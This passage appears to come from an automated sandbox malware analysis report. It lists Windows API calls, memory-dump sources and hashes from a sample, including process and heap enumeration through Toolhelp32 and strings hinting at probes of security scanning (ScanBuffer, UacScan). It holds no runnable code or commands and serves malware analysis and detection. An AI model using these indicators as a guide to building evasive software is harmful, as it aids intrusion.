                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InitVariant
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1927566239-0
                                                                                                                                              • Opcode ID: b3abfdefeffe100e5baed2334d119d4c9d82877abb308b0cad321b4269446af5
                                                                                                                                              • Instruction ID: 475752ce743f7d90e01d8ebc5654e250850b3ffbdf8932fc33fc8e706f21aa8c
                                                                                                                                              • Opcode Fuzzy Hash: b3abfdefeffe100e5baed2334d119d4c9d82877abb308b0cad321b4269446af5
                                                                                                                                              • Instruction Fuzzy Hash: EC313E71A00249AFDB11DEB8C989AAE77F8EB0C304F64456DF905D3251D734EA51CBA2
                                                                                                                                              APIs
                                                                                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,027D6D41,?,?,?,00000000), ref: 027D6D21
                                                                                                                                                • Part of subcall function 027C4C0C: SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeFromProgString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4225568880-0
                                                                                                                                              • Opcode ID: 2e83a0193070f540739f5c18aa9bd46c2cd6fdc9392a9cf26be86bc4e05c025e
                                                                                                                                              • Instruction ID: cbefdf5a977d3ba09958bdd0266188be22d76417a6d6f745162c8e968ac6bd91
                                                                                                                                              • Opcode Fuzzy Hash: 2e83a0193070f540739f5c18aa9bd46c2cd6fdc9392a9cf26be86bc4e05c025e
                                                                                                                                              • Instruction Fuzzy Hash: 83E0E570200204BBEB02FBB2EC6595A7BBDEB49B00B6104B9E501D3110D930AD009960
                                                                                                                                              APIs
                                                                                                                                              • GetModuleFileNameA.KERNEL32(027C0000,?,00000105), ref: 027C5832
                                                                                                                                                • Part of subcall function 027C5A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,027C0000,027ED790), ref: 027C5A94
                                                                                                                                                • Part of subcall function 027C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AB2
                                                                                                                                                • Part of subcall function 027C5A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,027C0000,027ED790), ref: 027C5AD0
                                                                                                                                                • Part of subcall function 027C5A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027C5AEE
                                                                                                                                                • Part of subcall function 027C5A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027C5B37
                                                                                                                                                • Part of subcall function 027C5A78: RegQueryValueExA.ADVAPI32(?,027C5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027C5B7D,?,80000001), ref: 027C5B55
                                                                                                                                                • Part of subcall function 027C5A78: RegCloseKey.ADVAPI32(?,027C5B84,00000000,?,?,00000000,027C5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027C5B77
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2796650324-0
                                                                                                                                              • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                              • Instruction ID: b2d1e55c612dd1c5e4acfff4aa90413ab83f8105c108b954c6e8e5cd4dbf6ce6
                                                                                                                                              • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                                                                                                                              • Instruction Fuzzy Hash: D1E06D71A002148FCB15DE6888C5A4637D8AB08750F90056DEC58EF34AD371E9208BD0
                                                                                                                                              APIs
                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 027C7DB0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FileWrite
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                              • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                              • Instruction ID: 7fd444de3562070954e014b4e9f23cd4d5226b30646aa87dd69e44cfcf3b737b
                                                                                                                                              • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                                              • Instruction Fuzzy Hash: B5D05B723081107AD224A96B5C84EB75BDCCBC9770F10063DB698C3180D720CC0186B1
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,027E2A49,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanBuffer,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,Initialize), ref: 027C7E47
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                              • Instruction ID: 9d65cc92ef84f59770e236b7172e9871b3d9b689733e0e47f946de471a06ffe4
                                                                                                                                              • Opcode Fuzzy Hash: 918f298baab567261b01832f852b415502b6f9a037000ea6829b55bd1045afca
                                                                                                                                              • Instruction Fuzzy Hash: 7AC08CF22026040E5E9862FC2CC829A438E09443347F02B2DE038D61C2DB21D8222810
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,027DF8CC,ScanString,0282137C,027EAFD8,OpenSession,0282137C,027EAFD8,ScanString,0282137C,027EAFD8,UacScan,0282137C,027EAFD8,UacInitialize), ref: 027C7E23
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                                                                                              • Instruction ID: c5d3ec6a195de22b342d94de4aedfa2a4fb6e86a7f605ddd59aeb78a040cba24
                                                                                                                                              • Opcode Fuzzy Hash: 5a31bfd882717e19bfdba3f43ec11c401b22dfbb3a9782c9602b5cd3cc3c38d2
                                                                                                                                              • Instruction Fuzzy Hash: 46C08CE32022000A5A5861FC1CD801A438C09443383B41B3DB038C62D2DB31C8122810
                                                                                                                                              APIs
                                                                                                                                              • SysFreeString.OLEAUT32(027DE950), ref: 027C4C1A
                                                                                                                                              • SysReAllocStringLen.OLEAUT32(027EBE78,027DE950,000000B4), ref: 027C4C62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                              • Opcode ID: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                                                                              • Instruction ID: 95698e0c829b4b8393482de5ebd8036436b789bb0d2311a260e590a56fa93389
                                                                                                                                              • Opcode Fuzzy Hash: 34a044716cc047832c89a5cdbf8a1cf543af0314eed8eb6eb3cc9569b15b6366
                                                                                                                                              • Instruction Fuzzy Hash: 13D080785011015DDF3C9D75C57CA37736AD9D03063BCC2ADD8024A265EB21D400CB31
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3341692771-0
                                                                                                                                              • Opcode ID: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                                                              • Instruction ID: 7b228d3f36e2b4a1b692b130fcbdd2fe08b473938637cfa630667cf8dc7663fe
                                                                                                                                              • Opcode Fuzzy Hash: ceb5ae88bf033e98fc82206b21d1e89e82677d744592aa3ef6d188a356359a2c
                                                                                                                                              • Instruction Fuzzy Hash: 69C012A664122447EB315AB8DCD0756A2CCDB05395B6400ADD408D7255E360DC004664
                                                                                                                                              APIs
                                                                                                                                              • timeSetEvent.WINMM(00002710,00000000,027EBB44,00000000,00000001), ref: 027EBB60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Eventtime
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2982266575-0
                                                                                                                                              • Opcode ID: 26f330c2df287d5dca33a4110d0cccb2dd8a9e18f94d4bfe6e3945d460dc30cd
                                                                                                                                              • Instruction ID: 7763ed7c7056e16c152a9fb3d77100e7edd43d50d96630e240cae669425c5cf5
                                                                                                                                              • Opcode Fuzzy Hash: 26f330c2df287d5dca33a4110d0cccb2dd8a9e18f94d4bfe6e3945d460dc30cd
                                                                                                                                              • Instruction Fuzzy Hash: FFC09BF07953003EF52156795CD1F33558DE344704F6114597605ED1D1D5D148504534
                                                                                                                                              APIs
                                                                                                                                              • SysAllocStringLen.OLEAUT32(00000000,?), ref: 027C4BEB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2525500382-0
                                                                                                                                              • Opcode ID: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                              • Instruction ID: 91f80ea2d2f77a7f04fd2a00d96f689fbfc1d7a28ac336d891a5fea73eb3362f
                                                                                                                                              • Opcode Fuzzy Hash: 45a3375204cc73dd1af73f008c830e5c9ef88422045493d1b6915fbd8ee49b80
                                                                                                                                              • Instruction Fuzzy Hash: 93B0123C34820218FE1019720D30B3300CC0B60387FF400ED9E29D80C5FF00C0008832
                                                                                                                                              APIs
                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 027C4C03
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeString
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3341692771-0
                                                                                                                                              • Opcode ID: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                                                              • Instruction ID: 8e056f411aa51dac71e0928f3f3c8f43100a7990cf6edf03fc2684b67544f237
                                                                                                                                              • Opcode Fuzzy Hash: 4210c3dfb18652f6ec0b0b51d6fbd20cd1f444da7e88b25de82dc1dad3c2e2d3
                                                                                                                                              • Instruction Fuzzy Hash: C8A022EC2003030A8F2B233C80B802B20333FE03003FAC0FC00000A0288F3AC000AC30
                                                                                                                                              APIs
                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,027C2000), ref: 027C16A4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                              • Opcode ID: 4d05cc4f428519aa57a12d156c342259dc5e9c64c94795d4d589c197af91a565
                                                                                                                                              • Instruction ID: 0013f8677826785e901ddf8bf8844d276b8972a58208b91fc4f65ac8250378c3
                                                                                                                                              • Opcode Fuzzy Hash: 4d05cc4f428519aa57a12d156c342259dc5e9c64c94795d4d589c197af91a565
                                                                                                                                              • Instruction Fuzzy Hash: 54F0F0B6B007946FD3219E5A9C80782BB90FB10310F11413DEA4897380C771A8148BD4
                                                                                                                                              APIs
                                                                                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,027C1FE4), ref: 027C1704
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                              • Opcode ID: 009fcd9514d272e6009af8181684d641ddc7571d84b6e83cbd4aff43db550d9d
                                                                                                                                              • Instruction ID: 4a1ef3e0617f6c9002f60a9a3bf60d3ccafc6a5d67f5841a2bf77b2c9fddf460
                                                                                                                                              • Opcode Fuzzy Hash: 009fcd9514d272e6009af8181684d641ddc7571d84b6e83cbd4aff43db550d9d
                                                                                                                                              • Instruction Fuzzy Hash: B6E086793003016FD7105A795D447127BD8EB58754F75447DF549DB282D660E8148B60
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,027DABE3,?,?,027DAC75,00000000,027DAD51), ref: 027DA970
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 027DA988
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 027DA99A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 027DA9AC
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 027DA9BE
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 027DA9D0
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 027DA9E2
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32First), ref: 027DA9F4
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 027DAA06
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 027DAA18
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 027DAA2A
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 027DAA3C
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 027DAA4E
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32First), ref: 027DAA60
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 027DAA72
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 027DAA84
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 027DAA96
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000004.00000002.2067570541.00000000027C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027C0000, based on PE: true
                                                                                                                                              • Associated: 00000004.00000002.2067531244.00000000027C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.00000000027ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067681818.000000000281E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002821000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002915000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000004.00000002.2067808664.0000000002918000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_4_2_27c0000_x.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                              • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                              • API String ID: 667068680-597814768
                                                                                                                                              • Opcode ID: f340358cb708153560b8fad1950db445615fd34fdcd9feff645b2d6053e8bc89
                                                                                                                                              • Instruction ID: fd6768db622f7e425473422dcfbfe780900e2937157acfcbedc1d31ade7ca02f
                                                                                                                                              • Opcode Fuzzy Hash: f340358cb708153560b8fad1950db445615fd34fdcd9feff645b2d6053e8bc89
                                                                                                                                              • Instruction Fuzzy Hash: 0B311DF4A80720AFFB11EFB4DACCA263BBDBB4630072049A9A046DF245D3749854CF51
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,027C7338,027C0000,027ED790), ref: 027C58D1
                                                                                                                                              • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 027C58E8
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,?), ref: 027C5918
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C597C
                                                                                                                                              • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59B2
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59C5
                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59D7
                                                                                                                                              • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,027C7338,027C0000,027ED790), ref: 027C59E3
